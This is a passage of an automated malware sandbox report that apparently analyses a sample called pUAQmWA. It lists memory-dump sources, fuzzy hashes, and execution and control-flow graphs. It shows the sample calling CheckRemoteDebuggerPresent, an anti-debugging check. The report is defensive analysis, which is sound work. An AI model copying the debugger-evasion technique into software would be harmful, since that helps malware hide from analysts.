                                                                                  • Instruction Fuzzy Hash: 0FE092B0D40209DFE780EFA9CA05A5EBBF1AB08204F1185A9D519E7321E7B4D6048F91
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.1725638344.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_6870000_pUAQmWA.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ce2db18778c69b29f1aec47f24601cd9413ee2445f24485543d254ac2c821830
                                                                                  • Instruction ID: 9c9aaa0253137e9a29bc40a37b99225ec30b09e7d9b22e0ca764c36a0d34b22a
                                                                                  • Opcode Fuzzy Hash: ce2db18778c69b29f1aec47f24601cd9413ee2445f24485543d254ac2c821830
                                                                                  • Instruction Fuzzy Hash: 22D0A73044E10DDBD350EBA0E42BFBD7BBCD79631AF005084A80993140CF75CB00E591
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.1725638344.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_6870000_pUAQmWA.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 645dc04e82527793510b4b524d387ba70bf0f61ef9a81d3fa50df0a0674e1aa8
                                                                                  • Instruction ID: e7d3331d6b3dc26bc6798ff4117ab533fd95a738ee18805e6f58d32b7c15880b
                                                                                  • Opcode Fuzzy Hash: 645dc04e82527793510b4b524d387ba70bf0f61ef9a81d3fa50df0a0674e1aa8
                                                                                  • Instruction Fuzzy Hash: B7D0123211420C5E9BC0EE95F840D5ABBDDBB246203408432E504CB030E621F424DB92
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.1725638344.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_6870000_pUAQmWA.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 0413cf8e95d913897fae78b09be92c166443b5c556f6a051d22ef9ef54821a13
                                                                                  • Instruction ID: db1365498b78712bfacb267ea878e7e54a11d8d4fd80aabd62337643df254e15
                                                                                  • Opcode Fuzzy Hash: 0413cf8e95d913897fae78b09be92c166443b5c556f6a051d22ef9ef54821a13
                                                                                  • Instruction Fuzzy Hash: A0C02B300516088FD20427E4F80EB3C3F6DF706326F441021F58D41020CF784043CA71
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.1725638344.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_6870000_pUAQmWA.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: f147b988f30bf52586bfd91676776a298cfe5e555eb6f657d1010401906be16e
                                                                                  • Instruction ID: e01708ab9e56d62b80c60df410a0c9d0e7971748ef52b9282fc75918ee430ea1
                                                                                  • Opcode Fuzzy Hash: f147b988f30bf52586bfd91676776a298cfe5e555eb6f657d1010401906be16e
                                                                                  • Instruction Fuzzy Hash: 6BD09238E00228CFDB60CF24C891F99F7B1AB49318F1480D9880DA3302CB32AE82CF50
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.1725638344.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_6870000_pUAQmWA.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: cf8ea9d26738dfa9611ad686b21526e522821108a9d55950574fed3851603b07
                                                                                  • Instruction ID: 2f5f15b71ddea2a0e4baac0d8995e843c5c581c952ebbe50627c176ec4f0d909
                                                                                  • Opcode Fuzzy Hash: cf8ea9d26738dfa9611ad686b21526e522821108a9d55950574fed3851603b07
                                                                                  • Instruction Fuzzy Hash: C9D0CA34D0820ECFDB44CF80C696AADBBB2AB08304F204014D00AA2280CB38AA02CF80
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.1725638344.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_6870000_pUAQmWA.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: dcbbbf7aca9f92bf2725bf506d8508563d831585b420c6d6f6514baa9dfb1ec5
                                                                                  • Instruction ID: 8e037df6c1970bf691b81253af6e5c6699e168f9321f6a360bf825821e36b700
                                                                                  • Opcode Fuzzy Hash: dcbbbf7aca9f92bf2725bf506d8508563d831585b420c6d6f6514baa9dfb1ec5
                                                                                  • Instruction Fuzzy Hash: A2C09BF7954010DBD7811604C811F5E7B91FB25318F6984A0D140DA130D566D4385742
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.1725638344.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_6870000_pUAQmWA.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ee0a4848a37f13f64043c8c99e77cdac3133acf08da9fce8fa824fec1e0ef1ba
                                                                                  • Instruction ID: 9baf1eeb2025235746d05c93b1b51c9d296058e113bd1076d5ac6ed5e27c795f
                                                                                  • Opcode Fuzzy Hash: ee0a4848a37f13f64043c8c99e77cdac3133acf08da9fce8fa824fec1e0ef1ba
                                                                                  • Instruction Fuzzy Hash: 16B01257EB51148FF38890148C03BBF0300D3B571CF2C44319962D9350C498FA2F40AB
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.1725638344.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_6870000_pUAQmWA.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 1045c4585f526b422328584caf953428356135a43f2acb007658100c6b04c0f6
                                                                                  • Instruction ID: 7f09fa2b1a4dddd62046452862bc2ec057eb8a82493b42bda2f26c1b23c4e578
                                                                                  • Opcode Fuzzy Hash: 1045c4585f526b422328584caf953428356135a43f2acb007658100c6b04c0f6
                                                                                  • Instruction Fuzzy Hash: FEB0122A1F4E01AE968433688ED5D3FDC10EFB5704F408C117389C40248870D4A8912F
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Execution Graph

                                                                                  Execution Coverage: 8.6%
                                                                                  Dynamic/Decrypted Code Coverage: 100%
                                                                                  Signature Coverage: 0%
                                                                                  Total number of Nodes: 3
                                                                                  Total number of Limit Nodes: 0
                                                                                  execution_graph (node: address [API] -> successors)
                                                                                  • 13632: 16c70b0 -> 13633
                                                                                  • 13633: 16c70b1 CheckRemoteDebuggerPresent -> 13635
                                                                                  • 13635: 16c7136 (no successors)

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph (node: address range -> successors)
                                                                                  • 441: 16c6fa3-16c6fa5 -> 442, 443
                                                                                  • 442: 16c701f -> 445
                                                                                  • 443: 16c6fa7-16c6fab -> 444
                                                                                  • 444: 16c6fad-16c6fb0 -> 446, 447
                                                                                  • 445: 16c7020-16c7026 (no successors)
                                                                                  • 446: 16c6ff6-16c6ff9 -> 448, 449
                                                                                  • 447: 16c6fb2-16c6fba -> 452, 453
                                                                                  • 448: 16c6ffb-16c7000 -> 445
                                                                                  • 449: 16c7013-16c7015 -> 444, 451
                                                                                  • 451: 16c7017-16c701c -> 444
                                                                                  • 452: 16c6fbc-16c6fc1 -> 446
                                                                                  • 453: 16c6fc3 call 16c7180 -> 454
                                                                                  • 454: 16c6fc9-16c6fcb -> 455, 456
                                                                                  • 455: 16c6fcd-16c6fd2 -> 445
                                                                                  • 456: 16c6fe5-16c6fed -> 458, 459
                                                                                  • 458: 16c6fef-16c6ff4 -> 445
                                                                                  • 459: 16c7002-16c700a -> 461, 462
                                                                                  • 461: 16c700c-16c7011 -> 445
                                                                                  • 462: 16c6fd4-16c6fdc -> 464, 465
                                                                                  • 464: 16c701e -> 445
                                                                                  • 465: 16c6fde-16c6fe3 -> 445
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2887518450.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_16c0000_pUAQmWA.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 964398fd39d824aeb4b182cdcfb500aa1476c88d4665735d04deaec79f20891c
                                                                                  • Instruction ID: d4366c7c3d1cc9e817599a632dea2f274106cb766e6797b3593c9be00db30eb8
                                                                                  • Opcode Fuzzy Hash: 964398fd39d824aeb4b182cdcfb500aa1476c88d4665735d04deaec79f20891c
                                                                                  • Instruction Fuzzy Hash: 3441A8B6A0021A8FDB20DBA9C8447FEBBF5EF89620F14846ED445E7352D7389944CF64
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph (node: address range [API] -> successors)
                                                                                  • 467: 16c70a8-16c70aa -> 468, 469
                                                                                  • 468: 16c70ac -> 469
                                                                                  • 469: 16c70ad-16c70ae -> 470, 471
                                                                                  • 470: 16c70b0 -> 471
                                                                                  • 471: 16c70b1-16c7134 CheckRemoteDebuggerPresent -> 473, 474
                                                                                  • 473: 16c713d-16c7178 (no successors)
                                                                                  • 474: 16c7136-16c713c -> 473
                                                                                  APIs
                                                                                  • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 016C7127
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2887518450.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_16c0000_pUAQmWA.jbxd
                                                                                  Similarity
                                                                                  • API ID: CheckDebuggerPresentRemote
                                                                                  • String ID:
                                                                                  • API String ID: 3662101638-0
                                                                                  • Opcode ID: 61ad5cd57ec77b385bd0cb55a821a52fc86e0f629ed5ef52f80604c362f88409
                                                                                  • Instruction ID: 04123a648ec5616347ae94828a8305cf2303ed32763361eab404c12d188f1ffa
                                                                                  • Opcode Fuzzy Hash: 61ad5cd57ec77b385bd0cb55a821a52fc86e0f629ed5ef52f80604c362f88409
                                                                                  • Instruction Fuzzy Hash: AC2136B5900259CFCB10CF9AD884BEEBBF4EF49320F14846AE455A3751D778A944CFA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph (node: address range [API] -> successors)
                                                                                  • 477: 16c70b0-16c7134 CheckRemoteDebuggerPresent -> 480, 481
                                                                                  • 480: 16c713d-16c7178 (no successors)
                                                                                  • 481: 16c7136-16c713c -> 480
                                                                                  APIs
                                                                                  • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 016C7127
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2887518450.00000000016C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_16c0000_pUAQmWA.jbxd
                                                                                  Similarity
                                                                                  • API ID: CheckDebuggerPresentRemote
                                                                                  • String ID:
                                                                                  • API String ID: 3662101638-0
                                                                                  • Opcode ID: 17e986a09cf0b85c73982f802e7fc6a7b930474a421288661cd17685a843ec4b
                                                                                  • Instruction ID: 82c53d6981487f7ff31ef1cbf7999ba52a5fcb5ede4934c2aa9268b76dbfe6b9
                                                                                  • Opcode Fuzzy Hash: 17e986a09cf0b85c73982f802e7fc6a7b930474a421288661cd17685a843ec4b
                                                                                  • Instruction Fuzzy Hash: CD2114B18002598FCB10CF9AD884BEEBBF4AF49320F14846AE459A7251D778A944CFA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2887079135.000000000167D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167D000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_167d000_pUAQmWA.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 45eff710ed042126ed2445d53cece28f69a9337d4d0bbd239c362fbf2400f3ec
                                                                                  • Instruction ID: 3ef4ee63af2b652acbaea9839bd90405ffa9081b16a7f3737b1a7e8fa371d923
                                                                                  • Opcode Fuzzy Hash: 45eff710ed042126ed2445d53cece28f69a9337d4d0bbd239c362fbf2400f3ec
                                                                                  • Instruction Fuzzy Hash: 27212271504200DFCB12DF58DD80B26BBA5FF84314F24C96DD80A4B396C33AD447CA62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2887079135.000000000167D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167D000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_167d000_pUAQmWA.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                  • Instruction ID: b78e6da173779f4604733f96025d767e8f6751b51deac7a1dcb7450acde7becb
                                                                                  • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                  • Instruction Fuzzy Hash: BE11BB75504280CFDB12CF58D9C4B15BFA1FB84314F28CAAAD8494B756C33AD44ACB62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%